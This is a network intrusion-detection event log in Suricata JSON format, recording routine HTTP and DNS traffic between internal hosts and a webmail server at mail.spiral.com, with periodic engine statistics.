{"timestamp":"2020-02-29T00:07:51.409000+0000","flow_id":642560046543245,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34762,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6136},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":30699,"tx_id":0}} {"timestamp":"2020-02-29T00:07:51.417961+0000","flow_id":872744524144809,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":40322,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":32979,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:07:51.525948+0000","flow_id":872744524144809,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":40322,"proto":"UDP","dns":{"type":"answer","id":32979,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:07:51.525948+0000","flow_id":872744524144809,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":40322,"proto":"UDP","dns":{"type":"answer","id":32979,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:07:51.606717+0000","flow_id":642560046543245,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34762,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=mailbox","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8383}} {"timestamp":"2020-02-29T00:07:51.897720+0000","flow_id":642560046543245,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34762,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=mailbox","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8383},"app_proto":"http","fileinfo":{"filename":"\/imp\/dynamic.php","state":"CLOSED","stored":false,"size":35098,"tx_id":1}} {"timestamp":"2020-02-29T00:07:51.908564+0000","flow_id":859382880918804,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":60758,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":1153,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:07:52.016611+0000","flow_id":859382880918804,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":60758,"proto":"UDP","dns":{"type":"answer","id":1153,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:07:52.016611+0000","flow_id":859382880918804,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":60758,"proto":"UDP","dns":{"type":"answer","id":1153,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:07:52.097412+0000","flow_id":642560046543245,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34762,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":885},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/dynamicInit","state":"CLOSED","stored":false,"size":173,"tx_id":2}} {"timestamp":"2020-02-29T00:07:52.097516+0000","flow_id":642560046543245,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34762,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":903}} {"timestamp":"2020-02-29T00:07:54.171367+0000","flow_id":2004988097150431,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34760,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7998},"app_proto":"http","fileinfo":{"filename":"\/nag\/","state":"CLOSED","stored":false,"size":31377,"tx_id":1}} {"timestamp":"2020-02-29T00:07:57.000166+0000","event_type":"stats","stats":{"uptime":14129,"capture":{"kernel_packets":133931,"kernel_drops":0},"decoder":{"pkts":133933,"bytes":92600525,"invalid":183,"ipv4":132470,"ipv6":8,"ethernet":133933,"raw":0,"null":0,"sll":0,"tcp":127324,"udp":4948,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":691,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7094752},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2717,"ssn_memcap_drop":0,"pseudo":341,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2733,"synack":2724,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":140,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1760,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2257,"failed_udp":110},"tx":{"http":4554,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2335}},"flow_mgr":{"closed_pruned":2700,"new_pruned":15,"est_pruned":2307,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":19843,"memcap_state":0,"memcap_global":0},"http":{"memuse":76081,"memcap":0}}} {"timestamp":"2020-02-29T00:07:57.000953+0000","flow_id":1853994208105121,"event_type":"flow","src_ip":"192.168.10.122","src_port":37326,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:02:56.692897+0000","end":"2020-02-29T00:02:56.798619+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:07:57.100639+0000","flow_id":642560046543245,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34762,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":903},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/dynamicInit","state":"CLOSED","stored":false,"size":2334,"tx_id":2}} {"timestamp":"2020-02-29T00:08:02.053815+0000","flow_id":1012670264431159,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":58162,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":9702,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:08:02.162101+0000","flow_id":1012670264431159,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58162,"proto":"UDP","dns":{"type":"answer","id":9702,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:08:02.162101+0000","flow_id":1012670264431159,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58162,"proto":"UDP","dns":{"type":"answer","id":9702,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:08:02.253251+0000","flow_id":1274951032280348,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34764,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":358}} {"timestamp":"2020-02-29T00:08:02.253251+0000","flow_id":1274951032280348,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34764,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":358},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/viewPort","state":"CLOSED","stored":false,"size":240,"tx_id":0}} {"timestamp":"2020-02-29T00:08:03.000491+0000","flow_id":1908200990740010,"event_type":"flow","src_ip":"192.168.10.122","src_port":42172,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:03:02.101930+0000","end":"2020-02-29T00:03:02.213187+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:08:04.000248+0000","event_type":"stats","stats":{"uptime":14136,"capture":{"kernel_packets":133933,"kernel_drops":0},"decoder":{"pkts":133936,"bytes":92600723,"invalid":183,"ipv4":132473,"ipv6":8,"ethernet":133936,"raw":0,"null":0,"sll":0,"tcp":127327,"udp":4948,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":691,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095040},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2717,"ssn_memcap_drop":0,"pseudo":341,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2733,"synack":2724,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":140,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1760,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2257,"failed_udp":110},"tx":{"http":4554,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2335}},"flow_mgr":{"closed_pruned":2700,"new_pruned":15,"est_pruned":2308,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":19512,"memcap_state":0,"memcap_global":0},"http":{"memuse":76074,"memcap":0}}} {"timestamp":"2020-02-29T00:08:06.000428+0000","flow_id":1901152949615255,"event_type":"flow","src_ip":"192.168.10.122","src_port":59490,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:03:05.506519+0000","end":"2020-02-29T00:03:05.617809+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:08:06.000596+0000","flow_id":2199893709972968,"event_type":"flow","src_ip":"192.168.10.130","src_port":34754,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":19,"pkts_toclient":20,"bytes_toserver":3061,"bytes_toclient":18001,"start":"2020-02-29T00:06:56.878056+0000","end":"2020-02-29T00:07:05.888377+0000","age":9,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:08:07.254604+0000","flow_id":1274951032280348,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34764,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":358},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/viewPort","state":"CLOSED","stored":false,"size":613,"tx_id":0}} {"timestamp":"2020-02-29T00:08:07.957566+0000","flow_id":483732157340798,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":44264,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":62353,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:08:07.963657+0000","flow_id":739926956553289,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":36865,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":47439,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:08:08.000688+0000","flow_id":2064146958623533,"event_type":"flow","src_ip":"192.168.10.122","src_port":48633,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:03:07.238381+0000","end":"2020-02-29T00:03:07.343781+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:08:08.066104+0000","flow_id":483732157340798,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":44264,"proto":"UDP","dns":{"type":"answer","id":62353,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:08:08.066104+0000","flow_id":483732157340798,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":44264,"proto":"UDP","dns":{"type":"answer","id":62353,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:08:08.072093+0000","flow_id":739926956553289,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36865,"proto":"UDP","dns":{"type":"answer","id":47439,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:08:08.072093+0000","flow_id":739926956553289,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36865,"proto":"UDP","dns":{"type":"answer","id":47439,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:08:08.155844+0000","flow_id":1596077147384852,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34766,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=compose&type=new&token=zwiFi46-w1WbjcxymnmTfV7&uniq=1582934887646","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5164}} {"timestamp":"2020-02-29T00:08:08.292009+0000","flow_id":1066967241298197,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52700,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7849}} {"timestamp":"2020-02-29T00:08:09.000709+0000","flow_id":117556125411825,"event_type":"flow","src_ip":"192.168.10.130","src_port":34752,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":19,"pkts_toclient":24,"bytes_toserver":2365,"bytes_toclient":25319,"start":"2020-02-29T00:06:48.567793+0000","end":"2020-02-29T00:07:08.037208+0000","age":20,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:08:10.000794+0000","flow_id":2220655566946137,"event_type":"flow","src_ip":"192.168.10.122","src_port":49403,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:03:08.950105+0000","end":"2020-02-29T00:03:09.055838+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:08:10.644824+0000","flow_id":1066967241298197,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52700,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7849},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":43729,"tx_id":0}} {"timestamp":"2020-02-29T00:08:10.657157+0000","flow_id":1075243643438853,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":46096,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":6009,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:08:10.765374+0000","flow_id":1075243643438853,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46096,"proto":"UDP","dns":{"type":"answer","id":6009,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:08:10.765374+0000","flow_id":1075243643438853,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46096,"proto":"UDP","dns":{"type":"answer","id":6009,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:08:10.820420+0000","flow_id":1066967241298197,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52700,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=mailbox","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8526}} {"timestamp":"2020-02-29T00:08:10.921548+0000","flow_id":1066967241298197,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52700,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=mailbox","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8526},"app_proto":"http","fileinfo":{"filename":"\/imp\/dynamic.php","state":"CLOSED","stored":false,"size":36694,"tx_id":1}} {"timestamp":"2020-02-29T00:08:10.923541+0000","flow_id":1066967241298197,"event_type":"http","src_ip":"192.168.10.81","src_port":52700,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/search-topbar.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","length":0}} {"timestamp":"2020-02-29T00:08:11.000184+0000","event_type":"stats","stats":{"uptime":14143,"capture":{"kernel_packets":133962,"kernel_drops":0},"decoder":{"pkts":133984,"bytes":92620708,"invalid":183,"ipv4":132521,"ipv6":8,"ethernet":133984,"raw":0,"null":0,"sll":0,"tcp":127369,"udp":4954,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":691,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7094752},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2720,"ssn_memcap_drop":0,"pseudo":341,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2736,"synack":2727,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":140,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1763,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2260,"failed_udp":110},"tx":{"http":4557,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2338}},"flow_mgr":{"closed_pruned":2702,"new_pruned":15,"est_pruned":2311,"bypassed_pruned":0,"flows_checked":4,"flows_notimeout":3,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65531,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":19512,"memcap_state":0,"memcap_global":0},"http":{"memuse":89242,"memcap":0}}} {"timestamp":"2020-02-29T00:08:11.005418+0000","flow_id":503484692486814,"event_type":"flow","src_ip":"192.168.10.122","src_port":123,"dest_ip":"162.159.200.123","dest_port":123,"proto":"UDP","app_proto":"failed","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":90,"bytes_toclient":90,"start":"2020-02-29T00:03:10.449182+0000","end":"2020-02-29T00:03:10.451143+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:08:11.108345+0000","flow_id":417014135629625,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":47136,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":15506,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:08:11.216826+0000","flow_id":417014135629625,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":47136,"proto":"UDP","dns":{"type":"answer","id":15506,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:08:11.216826+0000","flow_id":417014135629625,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":47136,"proto":"UDP","dns":{"type":"answer","id":15506,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:08:11.283813+0000","flow_id":422558938389413,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52704,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":903}} {"timestamp":"2020-02-29T00:08:11.283813+0000","flow_id":422558938389413,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52704,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":903},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/dynamicInit","state":"CLOSED","stored":false,"size":173,"tx_id":0}} 